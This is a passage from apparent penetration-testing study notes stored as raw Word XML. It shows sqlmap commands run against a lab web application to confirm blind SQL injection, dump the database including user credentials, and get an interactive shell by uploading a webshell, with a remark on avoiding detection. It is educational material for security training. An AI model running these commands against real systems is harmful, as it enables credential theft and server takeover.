      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on our sample web application. We will set the URL we want to scan with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-u</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and specify the parameter to test using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001817">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001818">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="5588000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="107" name="image94.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image94.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId495"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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1819">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="966"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000181A">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000181B">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We submitted the entire URL after the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-u</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> specifier together with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter set to a dummy value. Once launched, we can press I on the default options. Sqlmap then returns a confirmation that we are dealing with a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">time-based blind</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL injection and provides additional fingerprinting information such as the web server operating system, web application technology stack, and the backend database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000181C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although the above command confirmed that the target URL is vulnerable to SQLi, we can extend our tradecraft by using sqlmap to dump the database table and steal user credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000181D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although sqlmap is a great tool to automate SQLi attacks, it provides next-to-zero stealth. Due to its high volume of traffic, sqlmap should not be used as a first-choice tool during assignments that require staying under the radar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000181E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To dump the entire database, including user credentials, we can run the same command as earlier with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--dump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000181F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001820">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4165600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="299" name="image294.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image294.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId496"/>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1821">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001822">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we're dealing with a blind time-based SQLi vulnerability, the process of fetching the entire database's table is quite slow, but eventually we manage to obtain all users' hashed credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001823">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another sqlmap core feature is the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--os-shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter, which provides us with a full interactive shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001824">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Due to their generally high latency, time-based blind SQLi are not ideal when interacting with a shell, so we'll use the first UNION-based SQLi example.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001825">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we need to intercept the POST request via Burp and save it as a local text file on our Kali VM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001826">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2933700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="527" name="image508.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image508.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49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1827">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001828">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we can invoke </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter, using our file containing the POST request as an argument. We also need to indicate which parameter is vulnerable to sqlmap, in our case </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">item</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Finally, we'll include </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--os-shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> along with the custom writable folder we found earlier.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001829">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000182A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -r post.txt -p item  --os-shell  --web-root "/var/www/html/tmp"\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000182B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="8077200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="557" name="image538.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image538.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId498"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="8077200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000182C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000182D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once sqlmap confirms the vulnerability, it prompts us for the language the web application is written in, which is PHP in this case. Next, sqlmap uploads the webshell to the specified web folder and returns the interactive shell, from which we can issue regular system commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018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2F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001830">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mmjz16feiybi" w:id="199"/>
      <w:bookmarkEnd w:id="199"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLMap and SQL injections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001831">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001832">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Good Resources for SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001833">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId499">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.hackingarticles.in/mssql-for-pentester-command-execution-with-xp_cmdshell/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001834">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId500">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.youtube.com/watch?v=1nJgupaUPEQ</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001835">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001836">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId501">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">HackTricks SQL injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001837">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001838">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId502">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PortSwigger SQL injections</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001839">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId503">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Port Swigger SQL commands cheatsheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000183A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000183B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3306</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, PostgreSQL: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5432</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, Oracle Database: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1521</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, MariaDB (a MySQL fork): </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3306, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mssql:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1433</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000183C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="534"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
